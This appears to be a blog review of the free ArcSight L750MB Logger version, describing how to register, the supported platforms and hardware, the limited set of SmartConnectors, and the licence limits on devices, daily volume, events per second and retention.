ArcSight L750MB Logger is now for free, since 16 August . A good occasion to discover this Logger version and to better know the provided features and limits of this product.

After the registration, no CCN is asked, with the promotional code, you will receive two separate emails. One will give you access to the ArcSight Download Center, and one hour latter you will receive your free licence key attached to the second email. Hopefully since, two or three weeks registrations are also allowed for users how are outside US & Canada.

From the ArcSight Download Center, you will be able first to download :

• The latest version of ArcSight L750MB Logger – 5.0 Patch 2 (5.0.0.5355.2) – 438.8 MB.
• All L750MB related documentations (Administrator Guide, Quick Start, Release Notes & the Software Licence Agreement).
• Limited ArcSight Syslog SmartConnectors for Linux and Windows (229.4 MB for Linux and 187 MB for Windows).
• All the limited Syslog SmartConnectors documentations.

Supported Plateforms & Browsers

Certified Operating Systems for ArcSight L750MB Logger installation are :

• Red Hat Enterprise Linux (RHEL), version 5.4, 64-bit
• Oracle Enterprise Linux (OEL) 5.4, 64-bit
• CentOS, version 5.4, 64-bit

Other supported Operating Systems are :

• Red Hat Enterprise Linux (RHEL), version 4.x, 64-bit
• CentOS, version 4.x, 64-bit

Virtual Machine installation of the above listed OS is supported. You will not able to install the Logger on an existing machine how is running MySQL or PostgreSQL. We recommend you a complete dedicated Operating System for the installation.

Supported browsers are, with Adobe Flash Player plug-in :

• Internet Explorer: Versions 7 and 8
• Firefox: Versions 3.0 and 3.5

For the Hardware requirement :

• 100 GB disk space will be enough cause the L750MB Logger has a 50 GB maximum compressed log (10:1) restriction.
• Minimum of 2 GB memory, but better 4 GB to gain the advantages of the 64 bits OS.
• 1 to 2 CPU cores are enough due to others L750MB limitations.

L750MB provided SmartConnectors

SmartConnectors will provide you the ability to send CEF normalized and aggregated events to the Logger. To use SmartConnectors with ArcSight Logger you need to create a “Smart Message Receiver” on the Logger.

I was surprised to see that the SmartConnectors provided with the L750MB Logger version are very limited in term of number. Normally ArcSight cover with his SmartConnectors technology around 250 different products. With L750MB you are able to install and use the following SmartConnectors :

• Cisco PIX/ASA (an average of 200 bytes per event)
• Cisco IOS Routers and Switches (an average of 150 bytes per event)
• Juniper Network and Security Manager (NSM) (an average of 300 bytes per event)
• Juniper JUNOS Routers and Switches (an average of 300 bytes per event)
• Red Hat Enterprise Linux (an average of 150 bytes per event)
• SNARE (an average of 800 bytes per event, depending on the Windows OS)
• Snort (an average of 200 bytes per event)

In addition or without SmartConnectors you could use the following others Logger Receivers :

• Syslog (UDP or TCP)
• File Transfer in SCP, SFTP or FTP.
• CEF TCP or UDP

The File Receiver is disabled cause the L750MB Logger don’t allow you to mount NFS, CIFS or SAN shares.

L750MB Features, Limitations and Restrictions

Features :

• Connector appliance features are disabled.
• Alerting module features are enabled.
• Reporting module features are enabled.
• SAN storage feature is disabled.
• Logger peering features are disabled.

Logger limits :

• 10 devices maximum could send they logs to the L750MB Logger. A device is the IP of the event generator. For example, you could have a Linux box with Syslog and Snort, the 2 events sources will be considered coming from the same generator IP. Also, the device, on the Logger, is a combination of a generator IP and a Receiver. We recommend you to use the same Receiver for common events sources on the same generator IP.
• The maximum number of daily collected data is 750 MB. The sum of the size of the original events is used to determine this value. 750 MB represent, with a 300 bytes event average size, 2 621 440 events per day ((750 * 1024 * 1024) / 300).
• The EPS rate is limited to a maximum of 60. So you will have a maximum of 5 184 000 events per day (60 * 86 400). But the 750 MB limit will stop you before you will reach the 60 EPS if you are running SmartConnectors like SNARE or Juniper.
• The maximum data retention is 50 GB with a compression rate of 10:1 (500 GB). But the Logger need an “Internal Event Storage Group” of 5 GB, so your total of maximum data retention is more less than 45 GB (450 GB).  This compression rate will permit you to store around 1 610 612 736 events ((450 x 1024 x 1024 x 1024) / 300). This total amount of events compared to the 750 MB limit will permit you to have a retention period of 614,4 day’s (1 610 612 736 / 2 621 440).

If the limit of 750 MB per day is exceeded, the software version of Logger continues to collect and store events. However, if this limit is exceeded 5 times (5 days) in a 30 day sliding windows, you will no more able to run “Searches” or run “Reports” on the collected events until the 30 day sliding window contains 4 or less data limit violations. A warning message will be displayed when a data limit violation occurs. You can also view the data limit violation information on the License information page.

ArcSight L750MB Logger is really a good solution for SMB companies how don’t have necessary lot of devices, but the limitation in supported SmartConnectors is a point how will maybe encourage IT guys to select a product with more native supported products.

Thanks for Christophe Briguet for its Log Caliper Iphone/Ipad application 🙂